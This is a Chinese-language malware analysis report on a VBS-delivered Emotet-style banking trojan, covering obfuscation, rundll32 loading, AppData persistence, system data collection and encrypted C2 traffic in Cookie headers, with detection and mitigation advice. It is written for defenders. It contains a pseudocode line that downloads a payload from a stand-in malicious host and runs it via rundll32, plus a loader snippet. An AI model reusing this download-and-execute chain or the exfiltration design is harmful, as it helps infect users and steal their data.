VBS脚本传播银行木马变体样本分析技术文档<\/h1>

1. 样本概述<\/h2>
本分析文档详细解析了一个通过VBS脚本传播的银行木马变体样本，该样本采用多阶段攻击方式，最终实现与C2服务器的加密通信。样本具有以下特点：<\/p>
使用高度混淆的VBS脚本作为初始攻击载体<\/li>
采用多阶段加载机制<\/li>
使用控制流平坦化等反分析技术<\/li>
实现ECDH密钥交换和AES加密通信<\/li>
具备持久化和信息收集能力<\/li> <\/ul>
2. 第一阶段：VBS脚本分析<\/h2>

2.1 初始混淆结构<\/h3>
样本开始部分定义了三个变量，通过重新构造和组合后，最终生成关键值：<\/p>
NbCTQqd = "wscrilqpt.exe \/\/E:vbscript"
<\/code><\/pre>
2.2 文件系统操作<\/h3>
脚本使用以下方法创建文件系统对象和临时文件：<\/p>
Set fso = CreateObject("Scripting.FileSystemObject")
tempFilePath = "C:\Users\[User]\AppData\Local\Temp\tmp123454321pmt.txt"
Set file = fso.CreateTextFile(tempFilePath)
<\/code><\/pre>
2.3 下载和执行机制<\/h3>
解混淆后可见脚本核心功能：<\/p>

从指定URL下载payload<\/li>
使用rundll32.exe<\/code>执行下一阶段恶意软件<\/li>
<\/ol>
' 伪代码表示实际功能
Download "http:\/\/malicious-site.com\/payloads"
Execute "rundll32.exe payload.dll,Control_RunDLL"
<\/code><\/pre>
3. 第二阶段：Emotet DLL分析<\/h2>
3.1 文件基本信息<\/h3>

32位DLL文件<\/li>
使用rundll32.exe加载，参数为Control_RunDLL<\/code><\/li>
入口点函数调用DllMain()<\/code><\/li>
<\/ul>
3.2 核心DLL加载机制<\/h3>

从资源中加载并解密32位DLL到内存<\/li>
解密后的DLL称为"X.dll"（基于硬编码字符串命名）<\/li>
可使用System Informer等工具进行内存转储<\/li>
<\/ol>
3.3 导出函数检查逻辑<\/h3>
if<\/span> (strcmp(ExportFunctionName, "Control_RunDLL"<\/span>) !=<\/span> 0<\/span>) {
<\/span><\/span>    \/\/ 重新使用Control_RunDLL参数执行
<\/span><\/span><\/span><\/span>    CreateProcessW("C:<\/span>\\<\/span>Windows<\/span>\\<\/span>syswow64<\/span>\\<\/span>rundll32.exe emotet.dll,Control_RunDLL"<\/span>);
<\/span><\/span>    ExitProcess(0<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4. X.dll深度分析<\/h2>
4.1 控制流平坦化混淆<\/h3>

主函数sub_1001FCD8<\/code>（重命名为Flatten_func<\/code>）使用控制流平坦化技术<\/li>
可使用IDAPython脚本在所有call指令处下断点进行分析：<\/li>
<\/ul>
import<\/span> idautils
<\/span><\/span>import<\/span> idaapi
<\/span><\/span>import<\/span> idc
<\/span><\/span>
<\/span><\/span>def<\/span> add_breakpoints_on_calls<\/span>(func_name):
<\/span><\/span>    func_ea =<\/span> idc.<\/span>get_name_ea_simple(func_name)
<\/span><\/span>    if<\/span> func_ea ==<\/span> idc.<\/span>BADADDR:
<\/span><\/span>        print(f<\/span>"Function <\/span>{<\/span>func_name}<\/span> not found!"<\/span>)
<\/span><\/span>        return<\/span>
<\/span><\/span>    
<\/span><\/span>    func =<\/span> idaapi.<\/span>get_func(func_ea)
<\/span><\/span>    if<\/span> not<\/span> func:
<\/span><\/span>        print("Function not found!"<\/span>)
<\/span><\/span>        return<\/span>
<\/span><\/span>    
<\/span><\/span>    for<\/span> head in<\/span> idautils.<\/span>Heads(func.<\/span>start_ea, func.<\/span>end_ea):
<\/span><\/span>        if<\/span> idc.<\/span>print_insn_mnem(head) ==<\/span> "call"<\/span>:
<\/span><\/span>            idc.<\/span>add_bpt(head)
<\/span><\/span>            print(f<\/span>"Breakpoint added at 0x<\/span>{<\/span>head:<\/span>x<\/span>}<\/span>"<\/span>)
<\/span><\/span>
<\/span><\/span>add_breakpoints_on_calls("Flatten_func"<\/span>)
<\/span><\/span><\/code><\/pre>4.2 字符串和API混淆技术<\/h3>

所有字符串在运行时解密<\/li>
API动态加载，避免静态分析检测<\/li>
示例：解密"advapi32.dll"字符串后使用LoadLibraryW<\/code>加载<\/li>
<\/ul>
4.3 路径检查和自复制<\/h3>

检查执行路径是否为%AppData%<\/code><\/li>
若非AppData路径，执行以下操作：

使用SHGetFolderPathW<\/code>获取AppData路径<\/li>
使用GetCommandLineW<\/code>检查参数<\/li>
使用CreateFileW<\/code>和GetFileInformationByHandleEx<\/code>获取自身信息<\/li>
生成随机文件名<\/li>
使用SHFileOperationW<\/code>复制文件<\/li>
使用DeleteFileW<\/code>删除Zone标识符<\/li>
<\/ul>
<\/li>
使用CreateProcessW<\/code>重新执行自身后退出<\/li>
<\/ol>
5. 持久化与信息收集<\/h2>
5.1 持久化机制<\/h3>

将x.dll复制到%appdata%<\/code>随机命名的文件夹中<\/li>
添加.xnj扩展名<\/li>
再次使用rundll32执行<\/li>
<\/ol>
5.2 信息收集功能<\/h3>
收集的系统信息包括：<\/p>

计算机名 (GetComputerNameA<\/code>)<\/li>
Windows目录 (GetWindowsDirectoryW<\/code>)<\/li>
卷信息 (GetVolumeInformationW<\/code>)<\/li>
桌面名称和MAC地址哈希<\/li>
窗口路径<\/li>
<\/ul>
数据格式化为用分号分隔的字符串：<\/p>
[计算机名];[Windows目录];[卷信息];[桌面名称哈希];[MAC地址];[窗口路径]
<\/code><\/pre>
6. 加密通信机制<\/h2>
6.1 密钥生成<\/h3>

使用椭圆曲线密码学(ECDH)：

生成ECDH私钥<\/li>
使用嵌入的ECDH公钥<\/li>
通过BCryptSecretAgreement<\/code>生成共享密钥<\/li>
<\/ul>
<\/li>
使用BCryptDeriveKey<\/code>从共享密钥派生AES密钥<\/li>
<\/ol>
6.2 C2通信流程<\/h3>


数据准备：<\/p>

组合收集的系统信息<\/li>
使用派生的AES密钥加密数据<\/li>
Base64编码加密结果<\/li>
<\/ul>
<\/li>

通信方式：<\/p>

使用WinINet API发送请求<\/li>
小数据使用GET请求，大数据使用POST请求<\/li>
数据在Cookie头中发送<\/li>
URI随机生成<\/li>
<\/ul>
<\/li>

Cookie头格式：<\/p>
Cookie: [随机密钥名]=[Base64编码值]
<\/code><\/pre>
Base64解码后包含：<\/p>

生成的ECDH公钥<\/li>
AES加密的请求数据<\/li>
随机字节<\/li>
<\/ul>
<\/li>
<\/ol>
7. 反分析技术总结<\/h2>


代码混淆<\/strong>：<\/p>

VBS脚本高度混淆<\/li>
控制流平坦化<\/li>
字符串加密<\/li>
<\/ul>
<\/li>

动态加载<\/strong>：<\/p>

所有API动态解析<\/li>
使用哈希比较而非函数名<\/li>
<\/ul>
<\/li>

环境感知<\/strong>：<\/p>

检查执行路径<\/li>
非预期环境自复制并重新执行<\/li>
<\/ul>
<\/li>

清理痕迹<\/strong>：<\/p>

删除临时文件<\/li>
移除Zone标识符<\/li>
<\/ul>
<\/li>
<\/ol>
8. 检测与缓解建议<\/h2>
8.1 检测指标<\/h3>


文件指标<\/strong>：<\/p>

%AppData%<\/code>中随机命名的.xnj文件<\/li>
临时目录中的可疑文本文件<\/li>
<\/ul>
<\/li>

网络指标<\/strong>：<\/p>

Cookie中包含Base64编码的随机密钥<\/li>
非常规URI请求<\/li>
<\/ul>
<\/li>

行为指标<\/strong>：<\/p>

Rundll32异常调用模式<\/li>
大量文件系统操作后自删除<\/li>
<\/ul>
<\/li>
<\/ol>
8.2 缓解措施<\/h3>


预防<\/strong>：<\/p>

禁用不必要的脚本执行<\/li>
限制rundll32执行权限<\/li>
<\/ul>
<\/li>

检测<\/strong>：<\/p>

监控异常进程创建链<\/li>
检测控制流平坦化模式<\/li>
<\/ul>
<\/li>

响应<\/strong>：<\/p>

隔离受感染系统<\/li>
检查AppData中的可疑文件<\/li>
分析网络连接中的异常加密通信<\/li>
<\/ul>
<\/li>
<\/ol>
9. 分析工具推荐<\/h2>


静态分析<\/strong>：<\/p>

IDA Pro（配合反混淆脚本）<\/li>
DIE（Detect It Easy）<\/li>
<\/ul>
<\/li>

动态分析<\/strong>：<\/p>

System Informer（原Process Hacker）<\/li>
Process Monitor<\/li>
<\/ul>
<\/li>

网络分析<\/strong>：<\/p>

Wireshark<\/li>
Fiddler<\/li>
<\/ul>
<\/li>

内存分析<\/strong>：<\/p>

Volatility<\/li>
Rekall<\/li>
<\/ul>
<\/li>

脚本工具<\/strong>：<\/p>

IDAPython（用于自动化分析）<\/li>
PowerShell（用于行为监控）<\/li>
<\/ul>
<\/li>
<\/ol>